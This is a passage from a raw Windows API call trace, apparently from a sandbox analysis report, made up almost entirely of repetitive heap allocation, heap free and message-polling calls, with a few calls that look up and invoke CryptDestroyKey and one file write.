hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0259.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0259.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0259.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0259.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf2c38 | out: hHeap=0x970000) returned 1 [0259.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0259.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0259.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x3bf0050 [0259.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1efb0 | out: hHeap=0x970000) returned 1 [0259.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0259.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0259.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0259.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0259.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x3bf2c38 [0259.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0259.043] WriteFile (in: hFile=0x2a0, lpBuffer=0x3bf2c38*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf2c38*, lpNumberOfBytesWritten=0x8cf5e4*=0x2be0, lpOverlapped=0x0) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf2c38 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.045] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0259.045] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0259.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0259.046] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0259.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0259.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e88 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0259.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0259.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.046] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0259.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0259.047] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0259.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.047] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0259.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0259.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0259.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0259.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0259.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e512c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0259.049] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0259.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0259.050] CryptDestroyKey (hKey=0xa87710) returned 1 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0259.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0259.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0259.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.051] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0259.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0259.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0259.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0259.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0259.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0259.052] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0259.052] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.052] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.052] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0259.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0259.053] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.053] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0259.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.053] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0259.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.053] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.053] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, 